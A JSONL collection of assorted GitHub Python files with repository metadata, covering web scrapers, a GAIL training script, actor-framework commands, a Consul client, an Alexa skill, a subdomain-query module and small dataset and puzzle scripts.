+{"seq_id":"1475376827","text":"from openapi.utils import extend_schema_tags\n\ntag = 'extension'\npath = tag\nname = '插件配置'\n\nextend_schema_tags(\n tag,\n name,\n {\n 'type':'dashboard_page',\n 'init': {\n 'path': '/api/v1/marketplace/',\n 'method': 'get'\n },\n 'local': {\n 'install': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/',\n 'method': 'post',\n 'description': '点击安装'\n },\n 'update': {\n 'tag': 'extension.update',\n 'description': '编辑'\n },\n 'delete': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'delete',\n 'description': '删除'\n }\n }\n }\n)\n\nextension_update_tag = 'extension.update'\nextension_update_name = '编辑系统插件'\n\nextend_schema_tags(\n extension_update_tag,\n extension_update_name,\n {\n 'type': 'form_page',\n 'init': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'get'\n },\n 'global': {\n 'update': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'put',\n 'description': '确定'\n }\n }\n }\n)","repo_name":"0079123/arkid","sub_path":"api/v1/pages/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"1458225480","text":"#This program has been created to extract the prices from Big Basket\n#It currently can extract the prices only from the category list of products, eg. Friuts and Vegetables\n#Urls of the pages has to be proived in the excel-urls.csv present in the main project folder\n#DO NOT CHANGE THE NAME/EXTENSION OF urls.csv\n#This program generates an output file-prices-(date-time).csv, which extracts the product item, mrp and final price\n\nimport scrapy\nimport csv\nfrom itertools import zip_longest\nimport datetime\nimport re\nimport json\nfrom selenium import webdriver \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nclass ProductPriceSpider(scrapy.Spider):\n\tname = \"bigbasket\"\n\n\tdef __init__(self):\n\t\tself.driver = webdriver.Chrome('/usr/bin/chromedriver')\n\t\t\t\t\t \n\tdef start_requests(self):\n\t\t#List of all urls to be searched. Commenting below code for testing \n\t\turls = []\n\n\t\t#reading input csv file\n\t\tfileName = \"urls.csv\"\n\t\twith open(fileName, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\turls.append(line)\n\n\t\tself.log(urls) \n\n\t\t#start extracting for all urls\n\t\tfor url in urls:\n\t\t\tself.log(url)\n\t\t\tyield scrapy.Request(url=url, callback=self.parse_link)\n\n\t#Parser specific for bigbasket htmls\n\t#Parser extracts item product name, quantity, MRP and final price\n\tdef parse_link(self, response):\t\t\t\n\t\tself.log(response.url)\n\t\tself.driver.get(response.url)\n\t\t\n\t\t#For list of subcategories of items wait for 15secs or until element is loaded\n\t\titems = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.tab-content div.item.prod-deck.row.ng-scope div.clearfix div.ng-scope\"))\n\t\t)\n\t\t\n\t\t#For individual product\n\t\titem = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250\"))\n\t\t)\n\t\n\t\tif items:\n\t\t\tself.log(\"Inside items\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div/a')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in title_rows:\n\t\t\t\tproduct_titles.append(row.get_attribute('text'))\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\tmeasure_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[2]/div//span[1]/span[@ng-bind=\"vm.selectedProduct.w\"]')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in measure_rows:\n\t\t\t\tproduct_measures.append(row.text)\n\t\t\tself.log(product_measures)\n\t\t\t\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div/h4/span[1]/span')\n\t\t\t#Extract only the MRP from the string\t\n\t\t\tfor row in mrp_rows:\n\t\t\t\tproduct_mrps.append(row.text)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final prize rows\n\t\t\tproduct_prices = []\n\t\t\toffer_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div[1]/h4/span[2]/span')\n\t\t\t#Extract the final price from the string\t\n\t\t\tfor row in offer_rows:\n\t\t\t\tproduct_prices.append(row.text)\n\t\t\tself.log(product_prices)\n\n\t\telif item is not None:\n\t\t\tself.log(\"Inside item\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[2]/h1').text\n\t\t\tproduct_titles.append(title)\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\t#measure = self.driver.find_element(By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\").split(\"\")[1].split(\"\\n\")[0]\n\t\t\t#measure = sel.select(\"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\")[0].split(\"\")[1].split(\"\\n\")[0]\n\t\t\t#product_measures.append(measure)\n\t\t\t#self.log(product_measures)\n\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[3]/div[3]/div/span[2]').text\n\t\t\tproduct_mrps.append(mrp)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final prize rows\n\t\t\tproduct_prices = []\n\t\t\tprice = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct\"]/div[2]/div[3]/div[4]').text\n\t\t\tproduct_prices.append(price)\n\t\t\tself.log(product_prices)\n\n\n\t\t#Write the extracted data into an output csv file\n\t\tfileName = 'prices-%s.csv' %datetime.datetime.now().strftime(\"%m-%d-%H-%M\")\n\t\twith open(fileName, 'a') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(zip(product_titles, product_measures, product_mrps, product_prices))\n\n\tdef tearDown(self):\t\t\n\t\tself.driver.close()\t\n","repo_name":"Sushma-Alse/bigbasketscrapy","sub_path":"extractor/spiders/bigbasket_spider.py","file_name":"bigbasket_spider.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19306942979","text":"import gym\nimport pybulletgym\nimport os\nimport sys\nimport pickle\nimport time\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom utils import *\nfrom utils.get_reacher_vars import get_exp \nfrom utils.plot_rewards import *\nfrom arg_parser import prep_parser\nfrom models.mlp_policy import Policy\nfrom models.mlp_critic import Value\nfrom models.mlp_policy_disc import DiscretePolicy\nfrom models.mlp_discriminator import Discriminator\nfrom torch import nn\nfrom core.ppo import ppo_step\nfrom core.common import estimate_advantages\nfrom core.agent import Agent\n\n\ndef gail_reward(state, action, encode=[], policy=[], beta=None):\n \"\"\"\n Reward based on Discriminator net output as described in GAIL\n \"\"\"\n saep = tensor(np.hstack((state, action, encode, policy)), dtype=dtype)\n with torch.no_grad():\n return -math.log(discrim_net(saep)[0].item())\n\n\ndef sgail_reward(state, action, encode=[], policy=[], beta=None):\n \"\"\"\n Reward based on Discriminator and Generator net output as described in SGAIL\n \"\"\"\n # TODO: Fix\n saep = tensor(np.hstack((state, action, encode, policy)), dtype=dtype)\n #print(math.log(policy[0]+ 1e-10))\n with torch.no_grad():\n D = discrim_net(saep)[0].item()\n return -( math.log(D) - math.log(1 - D) \n + beta*math.log(policy[0]+ 1e-10)\n )\n # log(D) - log(1-D) + beta*log(pi) (Sure about pol.?)\n # Entropy regularization term\n\n\ndef update_params(batch):\n states = torch.from_numpy(np.stack(batch.state)).to(dtype).to(device)\n actions = torch.from_numpy(np.stack(batch.action)).to(dtype).to(device)\n rewards = torch.from_numpy(np.stack(batch.reward)).to(dtype).to(device)\n masks = torch.from_numpy(np.stack(batch.mask)).to(dtype).to(device)\n with torch.no_grad():\n values = value_net(states)\n fixed_log_probs = policy_net.get_log_prob(states, actions)\n\n \"\"\"get advantage estimation from the trajectories\"\"\"\n advantages, returns = estimate_advantages(rewards, masks, values, args.gamma, args.tau, device)\n\n \"\"\"update discriminator using optimizer\"\"\"\n for _ in range(1):\n expert_state_actions = torch.from_numpy(expert_traj).to(dtype).to(device)\n g_o = discrim_net(torch.cat([states, actions], 1))\n e_o = discrim_net(expert_state_actions)\n optimizer_discrim.zero_grad()\n discrim_loss = discrim_criterion(g_o, ones((states.shape[0], 1), device=device)) + \\\n discrim_criterion(e_o, zeros((expert_traj.shape[0], 1), device=device))\n discrim_loss.backward()\n optimizer_discrim.step()\n\n \"\"\"perform mini-batch PPO update on G and V\"\"\"\n optim_iter_num = int(math.ceil(states.shape[0] / optim_batch_size))\n for _ in range(optim_epochs):\n perm = np.arange(states.shape[0])\n np.random.shuffle(perm)\n perm = LongTensor(perm).to(device)\n\n states, actions, returns, advantages, fixed_log_probs = \\\n states[perm].clone(), actions[perm].clone(), returns[perm].clone(), advantages[perm].clone(), fixed_log_probs[perm].clone()\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batch_size, min((i + 1) * optim_batch_size, states.shape[0]))\n states_b, actions_b, advantages_b, returns_b, fixed_log_probs_b = \\\n states[ind], actions[ind], advantages[ind], returns[ind], fixed_log_probs[ind]\n\n ppo_step(policy_net, value_net, optimizer_policy, optimizer_value, 1, states_b, actions_b, returns_b,\n advantages_b, fixed_log_probs_b, args.clip_epsilon, args.l2_reg)\n\n\ndef main_loop():\n rew_expert, rew_system, rel_goals = [], [], []\n\n beta = args.beta\n delta_beta = -args.w\n for i_iter in range(args.max_iter_num):\n \"\"\"generate multiple trajectories that reach the minimum batch_size\"\"\"\n discrim_net.to(torch.device('cpu'))\n batch, log = agent.collect_samples(args.min_batch_size, beta)\n discrim_net.to(device)\n\n t0 = time.time()\n # Update params of V, G, D\n update_params(batch)\n # Modulate entropy correction param\n beta += delta_beta\n\n \"\"\"Printing and saving\"\"\"\n t1 = time.time()\n rew_expert.append(log['avg_c_reward'])\n rew_system.append(log['avg_reward'])\n rel_goals.append(log['reached_goals']/log['goals'])\n\n if i_iter % args.log_interval == 0:\n print(\"beta: \", beta)\n print('Num goals: {}\\tReached goals: {}'.format(log['goals'], log['reached_goals']))\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\texpert_R_avg {:.2f}\\tR_avg {:.2f}'.format(\n i_iter, log['sample_time'], t1 - t0, log['avg_c_reward'], log['avg_reward']))\n\n if args.save_model_interval > 0 and (i_iter + 1) % args.save_model_interval == 0:\n to_device(torch.device('cpu'), policy_net, value_net, discrim_net)\n pickle.dump((policy_net, value_net, discrim_net, running_state), \n open(os.path.join(assets_dir(), 'learned_models/{}_gail_{}_{}.p'.format(args.env_name, \"comp\" if lower_dim else \"full\", str(i_iter+1))), 'wb'))\n to_device(device, policy_net, value_net, discrim_net)\n\n \"\"\"clean up gpu memory\"\"\"\n torch.cuda.empty_cache()\n\n return rew_expert, rew_system, rel_goals\n\n\n### Starting main procedures\n\n# Prepare hyperparams\nargs = prep_parser()\n\n\"\"\"Prepare torch\"\"\"\ndtype = torch.float64\ntorch.set_default_dtype(dtype)\ndevice = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')\nif torch.cuda.is_available():\n torch.cuda.set_device(args.gpu_index)\n\n\"\"\"environment\"\"\"\nenv = gym.make(args.env_name)\nlower_dim = args.lower_dim < env.observation_space.shape[0]\n\n\"\"\"seeding\"\"\"\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nenv.seed(args.seed)\n\n\"\"\"Load expert trajs and encode labels+other important stuff for Reacher (state compression)\"\"\"\nstate_dim, action_dim, is_disc_action, expert_traj, running_state, encodes_d = get_exp(env, args)\n# 1200 1100 1500 1200 (5k)\n# 2400 1900 2250 3450 (10k)\n# 4500 4350 5150 6000 (20k)\n# 5850 5100 6700 7350 (25k)\n# 11250 11400 14600 12750 (50k)\n# 24450 24250 27300 24000 (100k)\nexpert_traj = expert_traj[:5850]\nencodes_d = encodes_d[:5850]\nrunning_state.fix = True\n\n\"\"\"define actor and critic\"\"\"\n# Policy = Generator\nif is_disc_action: # For gridworld\n policy_net = DiscretePolicy(state_dim, env.action_space.n)\nelse: # For pyBullet\n policy_net = Policy(state_dim, env.action_space.shape[0], log_std=args.log_std)\n\n# State value fun\nvalue_net = Value(state_dim)\n\n# Discriminator\ndiscrim_net = Discriminator(state_dim + action_dim)\ndiscrim_criterion = nn.BCELoss()\nto_device(device, policy_net, value_net, discrim_net, discrim_criterion)\n\n# Define optimizers\noptimizer_policy = torch.optim.Adam(policy_net.parameters(), lr=args.learning_rate)\noptimizer_value = torch.optim.Adam(value_net.parameters(), lr=args.learning_rate)\noptimizer_discrim = torch.optim.Adam(discrim_net.parameters(), lr=args.learning_rate)\n\n# optimization epoch number and batch size for PPO\noptim_epochs = 10 # 10\noptim_batch_size = 64 # 64\n\n\"\"\"create agent\"\"\"\nagent = Agent(env, policy_net, device, custom_reward=gail_reward, targets=True,\n running_state=running_state, render=args.render, num_threads=args.num_threads, lower_dim=lower_dim)\n\n# Finally do the learning\nre, rs, rg = main_loop()\n\n# Plot results\nplot_r(re, \"Expert\", args.env_name)\nplot_r(rs, \"Environment\", args.env_name)\nplot_reached(range(len(rg)), rg, args.env_name, \"comp\" if lower_dim else \"full\")","repo_name":"k4d3v/S-GAIL_ZK","sub_path":"gail/gail_gym.py","file_name":"gail_gym.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"1508337487","text":"from time import time\n\nfrom ..utils.exceptions import CommandError\n\nfrom .proxy import command, ActorProxyMonitor\nfrom .futures import async_while\n\n\n@command()\ndef ping(request):\n return 'pong'\n\n\n@command()\ndef echo(request, message):\n '''Returns *message*'''\n return message\n\n\n@command()\ndef config(request, setget, name, *values):\n setget = setget.lower()\n if setget == 'get':\n if len(values) > 0:\n raise CommandError('\"config get\" accept only one parameter')\n return request.actor.cfg.get(name)\n elif setget == 'set':\n if len(values) > 1:\n raise CommandError('\"config get\" accept only two parameters')\n request.actor.cfg.set(name, values[0])\n return True\n else:\n raise CommandError('config must be followed by set or get')\n\n\n@command()\ndef run(request, callable, *args, **kwargs):\n '''Execute a python *callable*.'''\n return callable(request.actor, *args, **kwargs)\n\n\n@command(ack=False)\ndef stop(request):\n '''Stop the actor from running.'''\n return request.actor.stop()\n\n\n@command()\ndef notify(request, info):\n '''The actor notify itself with a dictionary of information.\n\n The command perform the following actions:\n\n * Update the mailbox to the current consumer of the actor connection\n * Update the info dictionary\n * Returns the time of the update\n '''\n t = time()\n actor = request.actor\n remote_actor = request.caller\n if isinstance(remote_actor, ActorProxyMonitor):\n remote_actor.mailbox = request.connection\n info['last_notified'] = t\n remote_actor.info = info\n callback = remote_actor.callback\n # if a callback is still available, this is the first\n # time we got notified\n if callback:\n remote_actor.callback = None\n callback.set_result(remote_actor)\n if actor.cfg.debug:\n actor.logger.debug('Got first notification from %s',\n remote_actor)\n elif actor.cfg.debug:\n actor.logger.debug('Got notification from %s', remote_actor)\n else:\n actor.logger.warning('notify got a bad actor')\n return t\n\n\n@command()\ndef spawn(request, **kwargs):\n '''Spawn a new actor.'''\n return request.actor.spawn(**kwargs)\n\n\n@command()\ndef info(request):\n ''' Returns information and statistics about the server as a json string'''\n return request.actor.info()\n\n\n@command()\nasync def kill_actor(request, aid, timeout=5):\n '''Kill an actor with id ``aid``.\n This command can only be executed by the arbiter,\n therefore a valid sintax is only::\n\n send('arbiter', 'kill_actor', 'abc')\n\n Return 'killed abc` if successful, otherwise it returns ``None``.\n '''\n arb = request.actor\n if arb.is_arbiter():\n await arb.send(aid, 'stop')\n proxy = await async_while(timeout, arb.get_actor, aid)\n if proxy:\n arb.logger.warning('Could not kill actor %s', aid)\n else:\n return 'killed %s' % aid\n","repo_name":"quantmind/pulsar","sub_path":"pulsar/async/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":1875,"dataset":"github-code","pt":"32"}
+{"seq_id":"14605683875","text":"from .base import Register\n\nimport consul\nimport requests\nimport random\n\n\nclass Consul(Register):\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.c = consul.Consul(host=host, port=port)\n\n def register(self, name, id, address, port, tags, check):\n\n if check is None:\n check = {\n \"HTTP\": f\"http://{address}:{port}/health\",\n \"GRPCUseTLS\": False,\n \"Timeout\": \"5s\",\n \"Interval\": \"5s\",\n \"DeregisterCriticalServiceAfter\": \"5s\"\n }\n else:\n check = check\n return self.c.agent.service.register(\n name=name,\n service_id=id,\n address=address,\n port=port,\n tags=tags,\n check=check,\n )\n\n def deregister(self, service_id):\n return self.c.agent.service.deregister(service_id)\n\n def get_all_service(self):\n return self.c.agent.services()\n\n def filter_service(self, filter):\n url = f\"http://{self.host}:{self.port}/v1/agent/services\"\n params = {\n \"filter\": filter\n }\n print(requests.get(url).json().values())\n return requests.get(url, params=params).json()\n\n def get_host_port(self, filter):\n url = f\"http://{self.host}:{self.port}/v1/agent/services\"\n params = {\n \"filter\": filter\n }\n data = requests.get(url, params=params).json()\n if data:\n service_info = random.choice(list(data.values()))\n return service_info[\"Address\"], service_info[\"Port\"]\n return None, None\n\n def get_service(self, name):\n service1 = self.c.agent.services()\n service = self.c.agent.services().get(name)\n if not service:\n return None, None\n return service['Address'], service['Port']\n","repo_name":"ShenJianPing0307/python_micro_with_greeter","sub_path":"greeter_web/utils/consul/consul.py","file_name":"consul.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"15318162655","text":"import json\nimport os\nimport logging\nfrom flask import Flask, render_template\nfrom flask_ask import Ask, statement, question\nfrom flask_ask.verifier import VerificationError\nfrom dotenv import load_dotenv, find_dotenv\nfrom yelp import Yelp\nfrom flask_dotenv import DotEnv\n\nload_dotenv(find_dotenv())\napp = Flask(__name__)\nask = Ask(app, '/')\nenv = DotEnv()\nenv.init_app(app)\n\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\napp_name = 'Eat Me'\n\n@ask.launch\ndef launch():\n welcome_text = render_template('welcome')\n welcome_repeat_text = render_template('welcome_repeat')\n\n return question(welcome_text).reprompt(welcome_repeat_text).simple_card(\n app_name, welcome_text)\n\n\n@ask.intent('AMAZON.HelpIntent')\ndef help():\n help_text = render_template('help')\n welcome_repeat_text = render_template('welcome_repeat')\n\n return question(help_text).reprompt(welcome_repeat_text).simple_card(\n app_name, help_text)\n\n\n@ask.intent('AMAZON.StopIntent')\n@ask.intent('AMAZON.CancelIntent')\ndef stop():\n bye_text = render_template('bye')\n\n return statement(bye_text)\n\n\n@ask.intent('EatMeIntent')\ndef yelp():\n yelp = Yelp(\n app_id=os.environ.get(\"YELP_APP_ID\"),\n app_secret=os.environ.get(\"YELP_APP_SECRET\"),\n app_access_token=os.environ.get(\"YELP_ACCESS_TOKEN\")\n )\n\n biz = yelp.run(term='restaurant', location='92683')\n miles = int(biz['distance'] / 1609.344)\n # print(biz)\n statement_text = render_template(\n 'answer',\n name=biz['name'],\n stars=biz['rating'],\n reviews=biz['review_count'],\n miles=miles,\n address=', '.join(biz['location']['display_address'])\n )\n statement_text = statement_text.replace('&', 'and')\n next_statement = render_template('answer_repeat')\n print(statement_text)\n\n return question(statement_text).reprompt(next_statement).simple_card(app_name, statement_text)\n\n\n@app.route('/')\ndef healthcheck():\n return 'ok'\n\n\n@ask.session_ended\ndef session_ended():\n return statement('')\n\n\n@app.errorhandler(VerificationError)\ndef failed_verification(error):\n print(error)\n return str(error), 400\n\n\n@app.errorhandler(Exception)\ndef global_exception(error):\n print(error)\n return statement('')\n\n\ndef main():\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kpx-dev/EatMe-Alexa-Food-Skill","sub_path":"eatme/eatme_flask.py","file_name":"eatme_flask.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"9414419656","text":"import os\nimport time\nfrom config import Config\nfrom controller.webscraping import WebScrapingController\nfrom models.country import Country\nfrom operators.utils import Utils\n\nlogger = Config.LOGGER.value\n\n\nclass CountryOperator:\n def __init__(self, web_scraping_operator: WebScrapingController, filename: str):\n self.web_scraping_operator = web_scraping_operator\n self.current_path = Config.CURRENT_PATH.value\n self.filename = filename\n self.url = web_scraping_operator.url\n\n def ProcessScraping(self) -> bool:\n soup = self.web_scraping_operator.GetPageResponse()\n results = self.web_scraping_operator.getHTMLValuesByTag(\n soup=soup, tag_name=\"section\", tag_attribute=\"id\", tag_value=\"countries\"\n )\n\n countries = results.find_all(\"div\", class_=\"col-md-4 country\")\n\n countries_objects = []\n for country in countries:\n name = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"h3\",\n tag_attribute=\"class\",\n tag_value=\"country-name\",\n )\n capital = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-capital\",\n )\n population = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-population\",\n )\n area = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-area\",\n )\n\n countries_objects.append(\n Country(\n name=name.text.strip(),\n capital=capital.text.strip(),\n population=population.text.strip(),\n area=area.text.strip(),\n ).to_dict()\n )\n\n Utils.listToCsv(countries_objects, self.current_path, self.filename)\n\n if os.path.isfile(f\"{self.current_path}/{self.filename}\"):\n logger.info(f\"File {self.filename} created/updated!\")\n return True\n else:\n return False\n\n def ProcessWithRetry(self):\n for attempt in range(Config.ATTEMPTS.value):\n log_attempt = f\"[attempt: {attempt}]\"\n logger.info(\n f\"{log_attempt} - Starting scraping on site [{self.url}] and creating csv\"\n )\n\n try:\n processed = self.ProcessScraping()\n if processed:\n logger.info(\n f\"{log_attempt} - Finishing scraping on site [{self.url}] and creating csv\"\n )\n except Exception as e:\n logger.error(f\"{log_attempt} - {e} - Scraping Error\")\n time.sleep(Config.RETRY_TIME.value)\n continue\n else:\n break\n","repo_name":"edipo-moreira/web_scraping","sub_path":"operators/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35140729516","text":"import os\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets import MNIST\nimport torchvision.transforms as transforms\n\n_ROWS28x28, _COLS28x28 = np.where(np.ones((28,28)))\n\ndef _to01(x):\n m = x.min()\n M = x.max()\n return (x-m)/(M-m)\n\ndef _pixels_choise(img, npixels):\n\n p = img.flatten() / img.sum()\n inds = np.where(p)[0]\n p = p[inds]\n\n choise = np.array(np.random.choice(inds, size=npixels, p=p))\n\n rows = _ROWS28x28[choise]\n cols = _COLS28x28[choise]\n\n return np.array(zip(rows,cols))\n\n\ndef _img2set(img, set_size_range=[300,500]):\n set_size = set_size_range[0] if set_size_range[0] == set_size_range[1] \\\n else np.random.randint(set_size_range[0], set_size_range[1])\n\n s = _pixels_choise(img.squeeze(), set_size)\n padded = np.zeros((set_size_range[1], 2),dtype=np.float32)\n padded[:s.shape[0],:] = s\n\n return padded\n\n\n\n\n\n\nclass MnistSetsDataset(Dataset):\n def __init__(self, train, set_size_range=[300,500]):\n trans = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (1.0,)),\n transforms.Lambda(lambda x: _to01(x)),\n transforms.Lambda(lambda x: np.array(x)),\n transforms.Lambda(lambda x: _img2set(x, set_size_range)),\n ])\n # if not exist, download mnist dataset\n #train_set = MNIST(root=root, train=True, transform=trans, download=True)\n root = './data'\n if not os.path.exists(root):\n os.mkdir(root)\n mnist_dataset = MNIST(root=root, train=train, transform=trans, download=True)\n\n self._dataset = [(data, target) for data, target in mnist_dataset]\n\n\n def __getitem__(self, item):\n return self._dataset[item]\n\n def __len__(self):\n return len(self._dataset)\n\nif __name__ == '__main__':\n import pylab as plt\n dataset = MnistSetsDataset(train=True, set_size_range=[10,100])\n\n for i in range(10):\n data=dataset[i][0]\n im = np.zeros([28,28])\n for row,col in data:\n im[int(row),int(col)] += 1\n\n plt.imshow(im)\n plt.show()\n\n\n","repo_name":"shohamne/set-augmentation","sub_path":"datasets/mnist_sets.py","file_name":"mnist_sets.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23202052399","text":"import collections\n\ndef solve():\n n = int(input())\n \n colList = [set() for x in range(n)]\n\n trace = 0\n rowProb = 0\n colProb = 0\n for x in range(n):\n row = input().split()\n rowSet = set()\n for y in range(len(row)):\n s = colList[y] \n value = int(row[y])\n \n if x == y:\n trace += value\n \n rowSet.add(value)\n s.add(value)\n\n rowProb = rowProb + 1 if(len(rowSet) < n) else rowProb\n\n for s in colList:\n colProb = colProb + 1 if (len(s) < n) else colProb\n \n\n return trace, rowProb, colProb\n\n\n\nfor case in range(int(input())):\n t, r, c = solve()\n print('Case #%d: %d %d %d' % (case+1, t, r, c))","repo_name":"iChauster/competitive_programming","sub_path":"2020/codejamqual/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29521163679","text":"from common.query import Query\n\n\nclass Urlscan(Query):\n def __init__(self, domain):\n Query.__init__(self)\n self.domain = domain\n self.module = 'Dataset'\n self.source = 'UrlscanQuery'\n\n def query(self):\n \"\"\"\n 向接口查询子域并做子域匹配\n \"\"\"\n self.header = self.get_header()\n self.proxy = self.get_proxy(self.source)\n url = 'https://urlscan.io/api/v1/search/'\n params = {'q': 'domain:' + self.domain}\n resp = self.get(url, params)\n self.subdomains = self.collect_subdomains(resp)\n\n def run(self):\n \"\"\"\n 类执行入口\n \"\"\"\n self.begin()\n self.query()\n self.finish()\n self.save_json()\n self.gen_result()\n self.save_db()\n\n\ndef run(domain):\n \"\"\"\n 类统一调用入口\n\n :param str domain: 域名\n \"\"\"\n query = Urlscan(domain)\n query.run()\n\n\nif __name__ == '__main__':\n run('sangfor.com')\n","repo_name":"shmilylty/OneForAll","sub_path":"modules/datasets/urlscan.py","file_name":"urlscan.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":7171,"dataset":"github-code","pt":"32"}
+{"seq_id":"71295473690","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport requests\nimport time\nimport os\nimport dotenv\n\n# environment variables and constants\ndotenv.load_dotenv()\nLTA_ACCOUNT_KEY = os.environ.get(\"LTA_ACCOUNT_KEY\")\nMONGODB_URI = os.environ.get(\"MONGODB_URI\")\nAPI_URL = \"http://datamall2.mytransport.sg/ltaodataservice/CarParkAvailabilityv2\"\n\nif __name__ == '__main__':\n # connect to MongoDB\n client = MongoClient(MONGODB_URI)\n db = client.car_park_when_sg\n\n # call the api\n print(\"Calling API...\")\n request_time = int(time.time())\n response = requests.get(API_URL, headers={\"AccountKey\": LTA_ACCOUNT_KEY})\n print(\"API response status code: \", response.status_code)\n\n # only proceed if response is successful\n if response.status_code == 200:\n api_data = response.json()[\"value\"]\n # pprint(api_data[1]) # view one object in the response\n\n print(request_time)\n # wrap the result\n doc_to_insert = {\"timestamp\": request_time, \"data\": api_data}\n\n # save to db and check result\n result = db.api_responses.insert_one(doc_to_insert)\n pprint(result)\n","repo_name":"m-t-chang/car-park-when-sg","sub_path":"scrape_data.py","file_name":"scrape_data.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
